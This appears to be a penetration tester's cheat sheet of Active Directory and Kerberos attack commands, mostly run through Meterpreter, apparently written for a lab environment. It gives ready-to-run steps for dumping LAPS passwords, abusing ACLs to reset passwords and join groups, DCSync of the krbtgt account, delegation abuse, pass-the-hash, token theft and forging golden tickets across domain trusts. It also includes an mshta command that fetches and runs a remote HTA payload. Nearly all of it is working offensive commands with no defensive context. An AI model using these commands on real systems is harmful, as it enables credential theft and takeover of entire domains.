# General

Send email with an attachment
```
apt-get update && apt-get install swaks
swaks --server [SERVER] --to user@example.com --from guest@example.com --attach [FILE]
```

## Active Directory

Map computers
```
meterpreter > load extapi
meterpreter > adsi_computer_enum [DOMAIN]
```

List domain administrators
```
meterpreter > adsi_nested_group_user_enum [DOMAIN] "CN=Domain Admins,CN=Users,DC=[DOMAIN],DC=com"
```

Get LAPS passwords
```
meterpreter > load powershell
meterpreter > powershell_import /tmp/PowerView.ps1
meterpreter > powershell_import /tmp/LAPSToolkit.ps1
meterpreter > powershell_execute "Get-LAPSComputers"
meterpreter > powershell_execute "Find-LAPSDelegatedGroups"
meterpreter > powershell_execute "Get-NetGroupMember -Name 'LAPS Password Readers'"
```

List current user access rights
```
meterpreter > load powershell
meterpreter > powershell_import /tmp/Helper.dll
meterpreter > powershell_execute [Helper.Remote.Enum]::GetUserRights()
meterpreter > powershell_execute [Helper.Remote.Enum]::GetGroupRights()
meterpreter > powershell_execute [Helper.Remote.Enum]::GetComputerRights()
```

Change user password (with {GenericAll, ExtendedRight(User-Force-Change-Password)} -> USER)
```
meterpreter > powershell_execute 'net user [USER] [PASSWORD] /domain'
meterpreter > powershell_execute 'Set-DomainUserPassword -Domain [DOMAIN] -Identity [USER] -AccountPassword (ConvertTo-SecureString [PASSWORD] -AsPlainText -Force)  -Verbose'
```

Add user to group (with {GenericAll, WriteProperty, Self} -> GROUP)
```
meterpreter > powershell_execute 'net group [GROUP] [USER] /add /domain'
meterpreter > powershell_execute 'Add-NetGroupUser -UserName [USER] -GroupName [GROUP] -Domain [DOMAIN]'
```

Add owner to group (with WriteOwner -> GROUP)
```
meterpreter > powershell_execute '[Helper.Remote.Domain]::ElevateWriteOwner("[GROUP]")'
```

Convert object access from WriteDacl to GenericAll
```
meterpreter > powershell_execute '[Helper.Remote.Domain]::ElevateWriteDacl("[OBJECT]")'
```

DCSync 
```
meterpreter > load kiwi
meterpreter > kiwi_cmd \"lsadump::dcsync /domain:[FQDN] /user:[DOMAIN]\\[USER]\"

(for golden ticket)
meterpreter > kiwi_cmd \"lsadump::dcsync /domain:[FQDN] /user:[DOMAIN]\\krbtgt"
```


## Kerberos

Find unconstrained delegation
```
meterpreter > powershell_execute '[Helper.Remote.Enum]::GetUnconstrainedDelegation()'
```

Exploit unconstrained delegation
```
meterpreter > powershell_execute '[Helper.Local.Ticket]::List()'
meterpreter > powershell_execute '[Helper.Remote.Spool]::Check("[TARGET]")'
meterpreter > powershell_execute '[Helper.Remote.Spool]::Trigger("[TARGET]", "[LOCAL]")'
meterpreter > powershell_execute '[Helper.Local.Ticket]::Dump("[TARGET]")'
meterpreter > powershell_execute '[Helper.Local.Ticket]::Import("[HASH]")'
```

Find constrained delegation
```
meterpreter > powershell_execute '[Helper.Remote.Enum]::GetConstrainedDelegation()'
```

Exploit constrained delegation to impersonate user against service (require compromised account/hash)
```
meterpreter > powershell_execute '[Helper.Common]::Hash("[PASSWORD]")'
meterpreter > powershell_execute '[Helper.Local.Ticket]::S4U("[USER]", "[HASH]", "[IMPERSONATE]", "[SPN]")'
```

Enable and exploit resource-based constrained delegation (with GenericAll,GenericWrite,WriteProperty,WriteDACL -> COMPUTER) to impersonate user against service
```
meterpreter > powershell_import /tmp/PowerView.ps1
meterpreter > powershell_shell
PS > $sid = Get-DomainComputer -Identity [SOURCE COMPUTER] -Properties objectsid | Select -Expand objectsid
PS > $SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($sid))"
PS > $SDbytes = New-Object byte[] ($SD.BinaryLength)
PS > $SD.GetBinaryForm($SDbytes, 0)
PS > Get-DomainComputer -Identity [TARGET COMPUTER] | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDbytes}
meterpreter > powershell_execute '[Helper.Local.Ticket]::S4U("[SOURCE COMPUTER]", "[SOURCE COMPUTER HASH]", "Administrator", "[SPN/TARGET]", "[DOMAIN]", "[ALTSPN/TARGET]")'
```

## Impersonation

Execute with hash:
```
python3 impacket/examples/psexec.py [DOMAIN]\[USER]@[TARGET] -hashes aad3b435b51404eeaad3b435b51404ee:e8a270511da7f8e43372da256e954d6d
```

Execute with krbtkt:
```
export PROXYRESOLV_DNS=[IF PROXYCHAINS]
export KRB5CCNAME=/tmp/krb5cc_...
python3 impacket/examples/psexec.py [DOMAIN]\[USER]@[TARGET] -k -no-pass
```

Execute as ticket:
```
meterpreter > execute -t -H -f cmd.exe -a "/c mshta http://192.168.49.72/test/payload.hta"
```

Execute as user:
```
meterpreter > run post/windows/manage/run_as_psh DOMAIN=[DOMAIN] USER=[ACCOUNT] PASS=[PASSWORD] EXE=cmd.exe ARGS='/c "whoami"'
```

Steal token from user with login credentials
```
meterpreter > powershell_import /tmp/Helper.dll
meterpreter > powershell_execute '[Helper.Local.Privilege]::CaptureToken("\\\\\\\\.\\\\pipe\\\\test")'
meterpreter > run post/windows/manage/run_as_psh DOMAIN=[DOMAIN] USER=[ACCOUNT] PASS=[PASSWORD] EXE=cmd.exe ARGS='/c "echo hello > \\\\localhost\\pipe\\test"'
```

DCSync as user (e.g. krbtgt, Administrator):
```
meterpreter > load kiwi
meterpreter > kiwi_cmd \"lsadump::dcsync /domain:[FQDN] /user:[DOMAIN]\\[USER]\"
```

Import kerberos ticket from hash (e.g. from dcsync):
```
meterpreter > kiwi_cmd \"sekurlsa::pth /user:[USER] /domain:[DOMAIN] /ntlm:[HASH]\"
meterpreter > powershell_execute '[Helper.Local.Ticket]::List()'
```

Create Golden Ticket
```
meterpreter > kiwi_cmd \"lsadump::dcsync /domain:[FQDN] /user:[DOMAIN]\\krbtgt\"
meterpreter > run post/windows/escalate/golden_ticket DOMAIN=[FQDN] KRBTGT_HASH=[NTLM_HASH] USE=true
```

Create Golden Ticket for BiDirectional Domain Trust (prod.corp1.com -> corp1.com)
```
meterpreter > kiwi_cmd \"lsadump::dcsync /domain:prod.corp1.com /user:PROD\\krbtgt\"
meterpreter > powershell_execute '[Helper.Remote.Enum]::GetDomainSID("prod.corp1.com")'
meterpreter > powershell_execute '[Helper.Remote.Enum]::GetDomainSID("corp1.com")'
meterpreter > kiwi_cmd \"kerberos::golden /user:h4x /domain:prod.corp1.com /sid:[PROD.CORP1.COM_SID] /krbtgt:[NTLM_HASH] /sids:[CORP1.COM_SID]-519 /ptt\"
meterpreter > powershell_execute '[Helper.Local.Ticket]::List()'
```

Find administrative groups to avoid SID filtering across forests (replace 519 in golden ticket if over 1000)
```
meterpreter > powershell_execute '[Helper.Remote.Enum]::GetGroupMembers("Administrators", "corp2.com")'
```
